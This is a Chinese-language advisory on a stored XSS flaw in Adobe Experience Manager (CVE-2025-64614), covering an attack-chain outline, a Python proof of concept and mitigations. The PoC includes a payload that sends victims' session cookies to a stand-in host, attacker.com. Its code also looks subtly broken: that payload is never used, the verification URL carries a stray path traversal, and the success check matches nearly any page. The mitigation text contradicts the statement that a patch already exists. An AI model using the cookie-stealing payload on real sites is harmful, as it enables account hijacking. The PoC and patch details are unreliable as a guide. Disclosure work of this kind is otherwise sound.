CVE-2025-64614 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64614

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64614是Adobe Experience Manager（AEM）中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响AEM 6.5.23及更早版本。攻击者利用此漏洞可以通过低权限账户将恶意JavaScript代码注入到易受攻击的表单字段中。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户访问包含该恶意内容的页面时，攻击代码会在受害者浏览器中执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。该漏洞需要用户交互，攻击者需要诱使受害者访问包含恶意脚本的页面。CVSS评分5.4，属于中等严重程度，主要因为其需要低权限账户和用户交互才能成功利用。Adobe官方已发布安全公告APSB25-115，建议用户尽快升级到修复版本。

技术细节

Adobe Experience Manager 6.5.23及更早版本在处理用户输入的表单字段时存在存储型XSS漏洞。漏洞根源在于应用程序未能对用户提交的内容进行充分的输入验证和输出编码。攻击者以低权限用户身份登录AEM系统后，可以将恶意JavaScript代码注入到表单输入字段中，例如在文本框、文本区域或其他可输入内容的位置插入<script>标签或事件处理器（如onerror、onload等）。由于缺乏适当的输入过滤，这些恶意内容会被存储在服务器数据库中。当其他用户访问包含该内容的页面时，服务器将未经正确编码的恶意内容返回给客户端浏览器，浏览器将其作为合法脚本执行。攻击者可以利用此漏洞执行任意JavaScript代码，包括窃取受害者的会话令牌、获取用户敏感信息、修改页面显示内容或进行进一步的社会工程攻击。该漏洞的利用需要攻击者拥有AEM系统的低权限账户，并且需要诱使受害者访问包含恶意内容的特定页面。

攻击链分析

STEP 1

步骤1

攻击者获取Adobe Experience Manager系统低权限账户

STEP 2

步骤2

攻击者登录AEM系统并访问存在漏洞的表单页面

STEP 3

步骤3

攻击者在表单输入字段中注入恶意JavaScript代码（如<script>标签或事件处理器）

STEP 4

步骤4

恶意脚本被存储在AEM服务器数据库中，未经过滤或编码

STEP 5

步骤5

受害者访问包含恶意内容的表单页面或提交结果页面

STEP 6

步骤6

服务器将未经适当编码的恶意内容返回给受害者浏览器

STEP 7

步骤7

受害者浏览器执行恶意JavaScript代码，攻击者窃取会话cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-64614 PoC - Adobe Experience Manager Stored XSS
# Target: Adobe Experience Manager < 6.5.24

target_url = "https://<aem-host>/content/forms/af/<form-path>.html"
login_url = "https://<aem-host>/libs/granite/core/content/login.html"
form_submit_url = "https://<aem-host>/content/forms/af/<form-path>/jcr:content/guideContainer.af.submit.jsp"

# XSS Payload - Stored in form field
xss_payload = '<script>alert(document.cookie)</script>'
event_handler_payload = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>'

session = requests.Session()

# Step 1: Login to AEM with low-privileged account
login_data = {
    '_charset_': 'utf-8',
    'j_username': '<low-privilege-user>',
    'j_password': '<password>',
    'validate': ''
}

response = session.post(login_url, data=login_data)

# Step 2: Submit form with malicious XSS payload
form_data = {
    'textField': xss_payload,  # Inject XSS into vulnerable field
    ':operation': 'granite:formSubmit'
}

response = session.post(form_submit_url, data=form_data)

# Step 3: Verify stored XSS - Victim visits the page
verify_url = f"{target_url}?item=../../.."
response = session.get(verify_url)

if xss_payload in response.text or 'script' in response.text.lower():
    print('[+] XSS payload successfully stored!')
    print('[+] PoC executed successfully')
else:
    print('[-] XSS may not be reflected or payload was sanitized')

影响范围

Adobe Experience Manager <= 6.5.23

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制低权限用户对表单编辑功能的访问权限；2）启用AEM的XSS过滤功能；3）对所有表单输入实施严格的输入验证；4）部署Web应用防火墙（WAF）规则过滤恶意脚本关键词；5）监控和审计表单提交日志，及时发现异常行为；6）考虑临时禁用非必要的表单功能。